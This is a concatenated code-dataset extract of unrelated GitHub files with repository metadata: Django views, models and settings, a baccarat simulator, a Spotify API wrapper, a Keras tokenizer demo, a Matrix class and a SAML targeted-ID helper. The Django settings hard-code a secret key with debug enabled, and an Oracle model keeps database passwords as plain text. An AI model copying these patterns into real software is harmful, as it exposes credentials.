        # If a specific area ID is given, get only that area.
        # If a filter parameter is given, then return only the areas
        # that match the query.
        # limit = request.query_params.get('limit', None)
        # order_by = request.query_params.get('order_by', 'state')
        # data = get_collection(ref, order_by=order_by, limit=limit, filters=[])
        # Optional: If a user is using traceability, then is there any
        # need to get location data from the API, or is the data in
        # Firestore sufficient (given Firestore is syncing with Metrc).
        # Otherwise, initialize a Metrc client and get areas from Metrc.
        # traced_location = cultivator.get_locations(uid=cultivation_uid)
        # # Optional: Get any filters from dict(request.query_params)
        return Response([{'make': "Subaru", 'model': "WRX", 'price': 21000}])
    elif request.method == 'POST':
        # TODO: Either create or update the area.
        # # Create a new location using: POST /locations/v1/create
        # cultivation_name = 'MediGrow'
        # cultivation_original_name = 'medi grow'
        # cultivator.create_locations([
        #     cultivation_original_name,
        #     'Harvest Location',
        #     'Plant Location',
        #     'Warehouse',
        # ])
        # # Get created location
        # cultivation= None
        # locations = track.get_locations(action='active', license_number=cultivator.license_number)
        # for location in locations:
        #     if location.name == cultivation_original_name:
        #         cultivation = location
        # # Update the name of the location using: POST /locations/v1/update
        # cultivator.update_locations([cultivation.uid], [cultivation_name])
        return Response({'data': []})
    elif request.method == 'DELETE':
        # TODO: Archive the area data and delete from Metrc.
        return Response({'data': []})
"keeganskeate@gmail.com"
] | keeganskeate@gmail.com |
4566d265de8c9de17ff705716fb33d9a946acd40 | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /dockerized-gists/2632280/snippet.py | 2c3e53153055035e65c3c069b7b509579d65212b | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 2,057 | py | #!/usr/bin/python
#
import sys
import os
import copy
import random
# One standard deck as baccarat card values: ace through nine count 1-9, and
# the four ten-valued ranks (10, J, Q, K) count 0.
# BUGFIX: the identical assignment was duplicated on two consecutive lines;
# the redundant copy has been removed.
deck = [1,2,3,4,5,6,7,8,9,0,0,0,0]
# Running tally of simulated outcomes, updated by main().
results = {
    'bank': 0,
    'player': 0,
    'tie': 0,
}
def generate_deck(n=1):
    """Return a shuffled shoe containing 4*n standard decks of card values."""
    decks = deck * 4 * n
    random.shuffle(decks)
    return decks
def simulate_game(decks):
    """Play one baccarat hand, popping cards from `decks` in place.

    Returns 'player', 'bank', or 'tie'. Scores are hand sums mod 10.
    The order of decks.pop() calls encodes the dealing order and must not
    be rearranged.
    """
    # Initial deal: two cards each, alternating player/bank.
    player = [decks.pop()]
    bank = [decks.pop()]
    player.append(decks.pop())
    bank.append(decks.pop())
    player_score = sum(player) % 10
    bank_score = sum(bank) % 10
    # A "natural" 8 or 9 ends the hand immediately.
    if player_score >= 8 or bank_score >= 8:
        if player_score > bank_score:
            return 'player'
        elif bank_score > player_score:
            return 'bank'
        else:
            return 'tie'
    # player draws 3rd card
    if player_score <= 5:
        pcard = decks.pop()
        player.append(pcard)
        # bank rules
        # Banker's draw depends on its own score and the player's third card
        # (standard tableau; the final branch covers ace, nine, and ten-value).
        if pcard in (2,3) and bank_score <= 4:
            bank.append(decks.pop())
        elif pcard in (4,5) and bank_score <= 5:
            bank.append(decks.pop())
        elif pcard in (6,7) and bank_score <= 6:
            bank.append(decks.pop())
        elif pcard == 8 and bank_score <= 2:
            bank.append(decks.pop())
        elif pcard in (1,9,0) and bank_score <= 3:
            bank.append(decks.pop())
    # Player stood (6 or 7): banker draws on 5 or less.
    elif bank_score <= 5:
        bank.append(decks.pop())
    player_score = sum(player) % 10
    bank_score = sum(bank) % 10
    if player_score == bank_score:
        return 'tie'
    return 'player' if player_score > bank_score else 'bank'
def main():
    """Simulate 3000 shoes of baccarat and print outcome probabilities."""
    for i in range(3000):
        # 3000 game / 8 decks of cards each
        decks = generate_deck(8)
        # Stop a shoe when fewer than ~11 cards remain (not enough for a hand).
        while len(decks) > 10:
            winner = simulate_game(decks)
            results[winner] += 1
    total = results['player'] + results['bank'] + results['tie']
    # NOTE(review): "probabilties" typo in the output string, left as-is to
    # preserve runtime behavior.
    print "Baccarat probabilties"
    print 'P(win|player)', results['player'] / float(total)
    print 'P(win|bank) ', results['bank'] / float(total)
    print 'P(tie) ', results['tie'] / float(total)
if __name__=="__main__":
    main()
| [
"gistshub@gmail.com"
] | gistshub@gmail.com |
40ad77e61a4e82b015bf0da7e66515953ad9eed4 | 2b5fd9d436a97726f852a12bab58b8d367f4866a | /apps/CMDB/model/oracle_modles.py | 85cecdfda15e7e6ac6002550d0218e5453001bc2 | [] | no_license | lxlzyf/roe | 07ff551b142c0411acb7ca6f759ea98b40ad9b72 | 2d7f1b01e2456875d14a75c90d8397965215bcd3 | refs/heads/master | 2020-03-27T06:00:43.587235 | 2018-08-20T10:47:47 | 2018-08-20T10:47:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,361 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from CMDB.model.yewutree_model import YewuTree
from django.contrib.auth.models import User
#群,一定属于某一个产品线,可能属于多个组,一个节点也是群
class OracleCluster(models.Model):
    """An Oracle cluster (a single node also counts as a cluster).

    Belongs to one product line (``tree_id``); per-user visibility is
    controlled through ``operator``.
    """
    # Architecture choices. Renamed from ``arch`` because the original tuple
    # name was immediately shadowed by the ``arch`` model field below.
    ARCH_CHOICES = (
        (u"主从", u"主从"),
        # BUGFIX: display label was u"单击" ("click"), a typo for u"单机"
        # ("standalone"); the stored value was already correct.
        (u"单机", u"单机"),
        (u"rac", u"rac"),
        (u"rac+从库", u"rac+从库")
    )
    name = models.CharField(u"集群名", max_length=30, blank=True,null=True)
    arch = models.CharField(verbose_name=u"集群架构", choices=ARCH_CHOICES, max_length=30, null=True, blank=True)
    db_version = models.CharField(verbose_name=u"数据库版本", max_length=30, null=True, blank=True)
    defaultdb=models.CharField(verbose_name=u"主用DB", max_length=30, null=True, blank=True)
    tree_id=models.ForeignKey(YewuTree,verbose_name=u"所属产品线", on_delete=models.SET_NULL, null=True, blank=True)
    desc = models.CharField(u"描述", max_length=100, null=True, blank=True)
    operator = models.ManyToManyField(User, verbose_name="可见的人", blank=True)
    def __unicode__(self):
        return self.name
    class Meta:
        db_table = 'Oracle_Cluster'
        verbose_name = 'Oracle 集群'
        verbose_name_plural = 'Oracle集群'
# 按照用户来划分产品线
class OracleUser(models.Model):
    """A database account belonging to one Oracle cluster.

    NOTE(review): ``db_password`` appears to be stored in plain text, and
    ``privlige`` is a misspelling of "privilege" — renaming the field would
    require a schema migration, so it is only flagged here.
    """
    db_user = models.CharField(max_length=30, null=True,blank=True)
    db_password=models.CharField(max_length=60, null=True,blank=True)
    privlige=models.CharField(verbose_name='权限',max_length=400, null=True,blank=True)
    dbcluster = models.ForeignKey(OracleCluster,verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
    def __unicode__(self):
        return self.db_user
    class Meta:
        db_table = 'Oracle_User'
        verbose_name = 'Oracle用户'
        verbose_name_plural = 'Oracle用户'
#数据库中的 DB,表空间信息
class Oracletablespace(models.Model):
    """A tablespace inside an Oracle cluster (name + size, free-form)."""
    tablespace_name = models.CharField(max_length=50,verbose_name=u"表空间名")
    dbcluster = models.ForeignKey(OracleCluster,verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
    tablespace_size=models.CharField(max_length=50,verbose_name=u"库大小")
    def __unicode__(self):
        return u'%s ' % ( self.tablespace_name)
    class Meta:
        db_table = 'Oracle_Tablespace'
        verbose_name = 'Oracle 表空间'
        verbose_name_plural = 'Oracle表空间'
#ORACLE 实例表。配置信息慢慢添加
class Oracle_Instance(models.Model):
    """One Oracle instance of a cluster: addressing, role, status, resources.

    NOTE(review): ``vist_ip`` looks like a typo for "visit_ip"; renaming
    would require a schema migration, so it is only flagged here.
    """
    # Role of this instance within its cluster.
    DB_ROLE = (
        (u"单库", u"单库"),
        (u"主库", u"主库"),
        (u"从库", u"从库"),
        (u"汇总", u"汇总")
    )
    # Operational status of the instance.
    DB_STATUS = (
        (u"使用中", u"使用中"),
        (u"未使用", u"未使用"),
        (u"故障", u"故障"),
        (u"其它", u"其它"),
    )
    dbtag = models.CharField(max_length=50, verbose_name=u"数据库标志", blank=True,null=True)
    vist_ip = models.GenericIPAddressField(verbose_name=u"访问VIP", max_length=15)
    m_ip = models.GenericIPAddressField(verbose_name=u"管理IP", max_length=15)
    other_ip= models.CharField(max_length=150, verbose_name=u"其他IP,逗号隔开")
    port = models.IntegerField(verbose_name=u"端口",default=1521)
    sid = models.CharField(verbose_name=u"SID", max_length=8,blank=True,null=True)
    idc = models.CharField(verbose_name=u"机房", max_length=18,blank=True,null=True)
    CLUSTER = models.ForeignKey(OracleCluster, verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
    role = models.CharField(verbose_name=u"DB角色", choices=DB_ROLE, max_length=30, null=True, blank=True)
    db_status = models.CharField(verbose_name=u"DB状态", choices=DB_STATUS, max_length=30, null=True, blank=True)
    memory = models.CharField(u"分配内存", max_length=30, null=True, blank=True)
    disk = models.CharField(u"磁盘位置", max_length=200, null=True, blank=True)
    memo = models.TextField(u"备注信息", max_length=200, null=True, blank=True)
    def __unicode__(self):
        return self.dbtag
    class Meta:
        db_table = 'Oracle_Instance'
        verbose_name = 'Oracle集群一个实例'
        verbose_name_plural = 'Oracle集群一个实例'
"flc009@163.com"
] | flc009@163.com |
3a349a33e9e4531c9a6cddd12c53e9f0b04d76cf | e592f12040848bedbe6ffe309cceb757366d1887 | /Spotify_main.py | caf867bcdd3b05c8dbc58e7780a1c9cffd8349ef | [] | no_license | Hadryan/Spotify_music_recommender-1 | 02a3f0e1b8545f99643bbc9ee72dd2869366d5c1 | dcaf6a518c29f7c12062fc7bc8e143d8edc9d588 | refs/heads/main | 2023-03-05T21:49:59.022693 | 2021-02-10T05:18:32 | 2021-02-10T05:18:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,582 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Feb 8 15:43:03 2021
@author: Victor
"""
import Spotify_Authorization
import spotipy
import pandas as pd
class Spotify_app():
    """Thin wrapper over spotipy that collects track metadata + audio
    features into pandas DataFrames.

    NOTE(review): the instance lists (ids/artists/...) are shared scratch
    state that each fetch method fills and then resets via clean_lists();
    methods are therefore not safe to interleave or call concurrently.
    """
    def __init__(self):
        # Authenticated spotipy client built from the project's auth helper.
        self.auth = Spotify_Authorization.auth()
        self.spotify = spotipy.Spotify(auth_manager=self.auth)
        # Scratch accumulators used (and cleared) by the fetch methods below.
        self.ids = []
        self.artists = []
        self.explicit = []
        self.name = []
        self.pop = []
        self.rel_date = []
    def clean_lists(self):
        """Reset all scratch accumulators between fetches."""
        self.ids.clear()
        self.artists.clear()
        self.explicit.clear()
        self.name.clear()
        self.pop.clear()
        self.rel_date.clear()
    def artist_toptracks(self, artist_id):
        """Return a DataFrame of an artist's top tracks with audio features."""
        artist = self.spotify.artist_top_tracks(artist_id)
        for i in artist['tracks']:
            self.artists.append(([x['name'] for x in i['artists']]))
            # Explicit flag encoded as 0/1 instead of bool.
            if i['explicit'] == False:
                self.explicit.append(0)
            else:
                self.explicit.append(1)
            self.name.append(i['name'])
            self.pop.append(i['popularity'])
            self.ids.append(i['id'])
            self.rel_date.append(self.spotify.track(i['id'])['album']['release_date'])
        # Release year = first 4 chars of the ISO release date.
        year = [d[:4] for d in self.rel_date]
        audio_features = self.get_audio_features(self.ids)
        rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
        self.clean_lists()
        return self.get_full_data(rest, audio_features)
    def album(self, album_id):
        """Return a DataFrame of an album's tracks with audio features."""
        album = self.spotify.album_tracks(album_id)
        for i in album['items']:
            self.artists.append([x['name'] for x in i['artists']])
            if (i['explicit']) == False:
                self.explicit.append(0)
            else:
                self.explicit.append(1)
            self.name.append(i['name'])
            # album_tracks items lack popularity/release date, so each track
            # requires an extra API round trip here.
            self.pop.append(self.spotify.track(i['id'])['popularity'])
            self.rel_date.append(self.spotify.track(i['id'])['album']['release_date'])
            self.ids.append(i['id'])
        year = [d[:4] for d in self.rel_date]
        audio_features = self.get_audio_features(self.ids)
        rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
        self.clean_lists()
        return self.get_full_data(rest, audio_features)
    def track(self, track_id):
        """Return a single-row DataFrame for one track with audio features."""
        track = self.spotify.track(track_id)
        self.artists.append([i['name'] for i in track['artists']])
        if track['explicit'] == False:
            self.explicit.append(0)
        else:
            self.explicit.append(1)
        self.name.append(track['name'])
        self.pop.append(track['popularity'])
        self.ids.append(track['id'])
        self.rel_date.append(track['album']['release_date'])
        year = [d[:4] for d in self.rel_date]
        audio_features = self.get_audio_features(self.ids)
        rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
        self.clean_lists()
        return self.get_full_data(rest, audio_features)
    def get_artist_id(self, artist_name):
        """Search artists by name; return DataFrame[id, Artist Name, Genres]."""
        dummy = []
        search = self.spotify.search(q=artist_name, type='artist')
        for i in search['artists']['items']:
            dummy.append([i['id'], i['name'], i['genres']])
        artist_id = pd.DataFrame(dummy)
        artist_id.columns = ['id', 'Artist Name', 'Genres']
        return artist_id
    def get_track_id(self, track_name):
        """Search tracks by name; return DataFrame[Song name, Artists, id]."""
        dummy = []
        search = self.spotify.search(q=track_name, type='track')
        for i in search['tracks']['items']:
            dummy.append([i['name'], [j['name'] for j in i['artists']], i['id']])
        track_id = pd.DataFrame(dummy)
        track_id.columns = ['Song name', 'Artists', 'id']
        return track_id
    def get_audio_features(self, ids):
        """Fetch audio features for each track id; return one DataFrame.

        NOTE(review): `audio` is referenced after the loop to build the
        column index, so an empty `ids` would raise NameError — confirm
        callers never pass an empty list.
        """
        val = []
        for music_id in ids:
            audio = self.spotify.audio_features(music_id)
            # Drop non-numeric/bookkeeping fields before tabulating.
            [audio[0].pop(k) for k in ['type', 'uri', 'track_href', 'analysis_url', 'time_signature']]
            val.append([i for i in audio[0].values()])
        index = [i for i in audio[0].keys()]
        audio_features = pd.DataFrame(val)
        audio_features.columns = index
        return audio_features
    def get_full_data(self, remain, audio_features):
        """Join metadata and audio-feature frames and order the columns."""
        remain.columns = ['explicit', 'artists', 'name', 'release_date', 'year', 'popularity']
        data = pd.concat([audio_features, remain], axis=1)
        cols = ['acousticness', 'artists', 'danceability', 'duration_ms', 'energy', 'explicit', 'id', 'instrumentalness', 'key', 'liveness', 'loudness', 'mode', 'name', 'popularity', 'release_date', 'speechiness', 'tempo', 'valence', 'year']
        data = data[cols]
        return data
    def playlist(self, playlist_id):
        """Return a DataFrame of a playlist's tracks with audio features."""
        pl=self.spotify.playlist_tracks(playlist_id=playlist_id)
        for i in pl['items']:
            self.artists.append([x['name'] for x in i['track']['artists']])
            if i['track']['explicit'] == False:
                self.explicit.append(0)
            else:
                self.explicit.append(1)
            self.name.append(i['track']['name'])
            self.pop.append(i['track']['popularity'])
            self.rel_date.append(i['track']['album']['release_date'])
            self.ids.append(i['track']['id'])
        year = [d[:4] for d in self.rel_date]
        audio_features = self.get_audio_features(self.ids)
        rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
        self.clean_lists()
        return self.get_full_data(rest, audio_features)
    def related_artists(self, artist_name):
        """Return a DataFrame of [name, id] for artists related to the first
        search hit for `artist_name`."""
        related_artists = []
        artist_id = self.get_artist_id(artist_name).iloc[0,0]
        search = self.spotify.artist_related_artists(artist_id)
        for i in search['artists']:
            related_artists.append([i['name'], i['id']])
        return pd.DataFrame(related_artists)
| [
"noreply@github.com"
] | Hadryan.noreply@github.com |
07aebc8436388522c9187ba82736dcfd7ad184a5 | a142b049668648f5a3ffb4714a9d472ff9f5e5e8 | /keras1/keras51_Tokenizer.py | f3f733838bea78c799af6bc85922b82620ebdf72 | [] | no_license | yunnyisgood/Tensorflow | 237944a3251b608bd688f1096618e55317265037 | 6af04eca3c51815509e53d65d03e471177b9e02f | refs/heads/main | 2023-08-09T14:35:28.939447 | 2021-09-13T14:02:20 | 2021-09-13T14:02:20 | 384,322,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.utils import to_categorical
# Demo of the Keras Tokenizer: fit on one Korean sentence, map it to word
# indices, then one-hot encode the index sequence.
text = '나는 진짜 매우 맛있는 밥을 진짜 마구 마구 먹었다.'
# fit_on_texts builds the word->index vocabulary (most frequent word = 1).
token = Tokenizer()
token.fit_on_texts([text])
print(token.word_index)
# {'진짜': 1, '마구': 2, '나는': 3, '매우': 4, '맛있는': 5, '밥을': 6, '먹었다': 7}
# texts_to_sequences replaces each word with its vocabulary index.
x = token.texts_to_sequences([text])
print(x)
# [[3, 1, 4, 5, 6, 1, 2, 2, 7]]
word_size = len(token.word_index)
print(word_size) # 7
print(type(x))
# One-hot encode: indices start at 1, so the vector width is max index + 1
# (here 8) -- column 0 is always unused.
x = to_categorical(x)
print(x)
print(x.shape)
'''
[[[0. 0. 0. 1. 0. 0. 0. 0.]
[0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 1. 0. 0. 0.]
[0. 0. 0. 0. 0. 1. 0. 0.]
[0. 0. 0. 0. 0. 0. 1. 0.]
[0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 1.]]]
(1, 9, 8)
''' | [
"cyeon0801@gmail.com"
] | cyeon0801@gmail.com |
4149763b5973c1df83a28fbbfac81d7ff11885af | 7fdf4c04baed5f429110045d555e384dc71e08f1 | /python/modules.py | 3e63a5694605d15b25b2648b1729092cf52fa80b | [] | no_license | andrsj/Python-Edu | 8f3d336fc35c325ca546fb508d49f7ee892b5b7d | a2f09876b977f071ff11576ad987af477b0889c6 | refs/heads/master | 2021-03-18T22:20:27.854983 | 2020-04-23T18:05:04 | 2020-04-23T18:05:04 | 247,105,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,574 | py | # MODULES
m.__dict__ # Атрибути модуля
m.__doc__ # Doc
m.__name__ # Name
m.__file__ # File
m.__path__ # Path
# module: spam.py
__all__ = [ ‘bar’, ‘Spam’ ]
# Ці імена будуть імпортовані при команді from spam import *
# Перевірити, чи модуль був запущений як програма
if __name__ == "__main__":
pass
else:
# Файл, був імпортований як модуль
pass
# Copy
copy()
deepcopy()
# sys
sys.float_info
sys.maxsize
sys.path
sys:
stdout | stdin | stderr
# Decimal
import decimal
x = decimal.Decimal("3.4")
y = decimal.Decimal("4.5")
a = x * y # a = decimal.Decimal(‘15.30’)
b = x / y # b = decimal.Decimal(‘0.7555555555555555555555555556’)
decimal.getcontext().prec = 3
c = x * y # c = decimal.Decimal(‘15.3’)
d = x / y # d = decimal.Decimal(‘0.756’)
a = decimal.Decimal(42) # Створить Decimal("42")
b = decimal.Decimal("37.45") # Створить Decimal("37.45")
c = decimal.Decimal((1,(2,3,4,5),-2)) # Створить Decimal("-23.45")
d = decimal.Decimal("Infinity")
e = decimal.Decimal("NaN")
x.exp()
x.ln()
x.log10()
x.sqrt()
# Fractions
>>> f = fractions.Fraction(3,4)
>>> f
Fraction(3, 4)
>>> g = fractions.Fraction(“1.75”)
>>> g
Fraction(7, 4)
>>> h = fractions.Fraction.from_float(3.1415926)
Fraction(3537118815677477, 1125899906842624)
>>>
# Datetime
import datetime
x = datetime.datetime.now()
print(x)
print(x.strftime("%_"))
VVVVVVVVVVVVVVVVVVVVVVVV
%a Weekday, short version Wed
%A Weekday, full version Wednesday
%w Weekday as a number 0-6, 0 is Sunday 3
%d Day of month 01-31 31
%b Month name, short version Dec
%B Month name, full version December
%m Month as a number 01-12 12
%y Year, short version, without century 18
%Y Year, full version 2018
%H Hour 00-23 17
%I Hour 00-12 05
%p AM/PM PM
%M Minute 00-59 41
%S Second 00-59 08
%f Microsecond 000000-999999 548513
%z UTC offset +0100
%Z Timezone CST
%j Day number of year 001-366 365
%U Week number of year, Sunday as the first day of week, 00-53 52
%W Week number of year, Monday as the first day of week, 00-53 52
%c Local version of date and time Mon Dec 31 17:41:00 2018
%x Local version of date 12/31/18
%X Local version of time 17:41:00
%% A % character % | [
"61803449+andrsj@users.noreply.github.com"
] | 61803449+andrsj@users.noreply.github.com |
052f814055a4ea1b0c87f9a67983858539c629f3 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/matrix/03621ea5957641a2ad11d0d2303103e5.py | 5c1164e155a96298fac1d2fac55d3c2c202a80e4 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,857 | py | class Matrix:
def __init__(self, data):
"""Create a matrix object and fill it with the provided data.
The data must be the matrix in ASCII format, with embedded newlines,
e.g. '1 2 3\n4 5 6'.
"""
self.height = 0
self.width = 0
self._data = []
for row in data.split("\n"):
self.height += 1
row_values = [int(v) for v in row.strip().split()]
if not self.width:
self.width = len(row_values)
elif self.width != len(row_values):
raise ValueError(
"Row %d has an unexpected number of values" % self.height)
self._data.extend(row_values)
@property
def rows(self):
"""A list of matrix rows."""
return [
self._data[row*self.width : (row+1)*self.width]
for row in xrange(0, self.height)
]
@property
def columns(self):
"""A list of matrix columns."""
return [
self._data[column :: self.width]
for column in xrange(0, self.width)
]
def _data_index(self, column, row):
if row < 0 or row > self.height:
raise IndexError("Row %d does not exist" % row)
if column < 0 or column > self.width:
raise IndexError("Column %d does not exist" % column)
return column + row * self.width
def get(self, column, row):
"""Returns the value from the matrix at coordinate (column, row)."""
return self._data[self._data_index(column, row)]
def set(self, column, row, value):
"""Set the value for the matrix at coordinate (column, row)."""
self._data[self._data_index(column, row)] = value
    def sum(self):
        """Returns the sum of all values in the matrix."""
        # Delegates to the builtin sum over the flat storage list.
        return sum(self._data)
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
77c0e37ed35697f5c5bdcd4b5739f3cce73b4472 | ffd0603413ec537e14f977196b564f4523e29545 | /mysite/mysite/settings.py | 0fa56d38541987273f522ac81761da22f61ab163 | [] | no_license | sorwarduet/blog_project_new | 3b58d407c22bf3f4fbfe796356cc073082f80c9a | 98c37fb474860971dc28a5a1730826d31c9d6f6c | refs/heads/master | 2021-08-23T11:53:14.324873 | 2017-12-04T20:07:05 | 2017-12-04T20:07:05 | 113,047,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,331 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# App-local template/static directories, wired into TEMPLATES['DIRS'] and
# STATICFILES_DIRS below.
TEMPLATE_DIR=os.path.join(BASE_DIR,'blog/templates/blog')
STATIC_DIR=os.path.join(BASE_DIR,'blog/static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# from the environment before any production deployment.
SECRET_KEY = 'g50b-v83-g_4yd8$lmtqx4%!xeg-s4)8z(i0694ku0*dxtaj3^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [TEMPLATE_DIR,],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# Development default: file-based SQLite in the project root.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT=os.path.join(BASE_DIR,'static')
# After login, django.contrib.auth redirects to the site root.
LOGIN_REDIRECT_URL='/'
STATICFILES_DIRS=[
STATIC_DIR,
] | [
"esorwar.cse@gmail.com"
] | esorwar.cse@gmail.com |
50a976545023e2867694a4b0470c533b5ec610fb | a1794eabcc58e65cf49087c846a8cf1e7ee83941 | /desktop/core/ext-py/pysaml2-2.4.0/src/saml2/eptid.py | b2551b44f6ce3ae5220ca03de959043a020dbc10 | [
"Apache-2.0"
] | permissive | BelieveDjango/hue | 22502a5f250d5df4c3adc1afa2e3b659e8888089 | d6cbec42d8bcb1e9c0f729b5a22a38abb2c6dee4 | refs/heads/master | 2023-08-31T01:20:23.906783 | 2016-05-19T23:51:28 | 2016-05-19T23:51:28 | 59,281,298 | 0 | 0 | Apache-2.0 | 2023-08-11T05:06:18 | 2016-05-20T09:16:05 | Python | UTF-8 | Python | false | false | 1,368 | py | # An eduPersonTargetedID comprises
# the entity name of the identity provider, the entity name of the service
# provider, and a opaque string value.
# These strings are separated by "!" symbols. This form is advocated by
# Internet2 and may overtake the other form in due course.
import hashlib
import shelve
import logging
logger = logging.getLogger(__name__)
class Eptid(object):
    """Generate and cache eduPersonTargetedID values.

    An id has the form ``<idp entity id>!<sp entity id>!<opaque hash>``,
    where the hash is an MD5 over the user arguments, the SP entity id and
    a site secret.
    """

    def __init__(self, secret):
        # In-memory id cache; EptidShelve replaces this with a shelve file.
        self._db = {}
        self.secret = secret

    def make(self, idp, sp, args):
        """Build a new targeted id for (idp, sp, user args)."""
        md5 = hashlib.md5()
        for arg in args:
            md5.update(arg.encode("utf-8"))
        # Bug fix: sp and the secret were fed to md5 as text, which raises
        # TypeError under Python 3 (hashlib accepts only bytes); encode them
        # the same way as the user arguments.  The discarded md5.digest()
        # call has been dropped -- it had no effect on hexdigest().
        md5.update(sp.encode("utf-8"))
        md5.update(self.secret.encode("utf-8"))
        hashval = md5.hexdigest()
        return "!".join([idp, sp, hashval])

    def __getitem__(self, key):
        return self._db[key]

    def __setitem__(self, key, value):
        self._db[key] = value

    def get(self, idp, sp, *args):
        """Return the cached id for (sp, args[0]), creating it on first use."""
        # key is a combination of sp_entity_id and object id
        key = ("__".join([sp, args[0]])).encode("utf-8")
        try:
            return self[key]
        except KeyError:
            val = self.make(idp, sp, args)
            self[key] = val
            return val
class EptidShelve(Eptid):
    """Eptid variant that persists the id cache in a shelve file."""
    def __init__(self, secret, filename):
        Eptid.__init__(self, secret)
        # writeback=True caches written entries in memory; they are flushed
        # when the shelf is sync()ed or closed.
        self._db = shelve.open(filename, writeback=True)
| [
"erickt@cloudera.com"
] | erickt@cloudera.com |
0ac1d93bb67a120a72ecf7874363b5562af9dee2 | cdd499a39bc4c5152ade3b106abf0eddfea2a133 | /analysis.py | 691bec189d8b79e88a843ea347462c50ddaefefc | [] | no_license | joel99/illusions | 307f7f7b94061ad67ca90702529e64cc49fc21e5 | 3f4adeebc38e94ef15a1b6f169754a3274319c3a | refs/heads/main | 2023-04-29T21:16:23.418173 | 2021-05-05T00:00:36 | 2021-05-05T00:00:36 | 352,145,024 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,524 | py | #%%
from pathlib import Path
import os.path as osp
from yacs.config import CfgNode as CN
import matplotlib.pyplot as plt
from PIL import Image
import torch
import torch.nn.functional as F
from config.default import get_config
from model import SaccadingRNN
from dataset import UniformityDataset
seed = 0
config = './config/base.yaml'
config = './config/debug.yaml'
# config = './config/debug2.yaml'
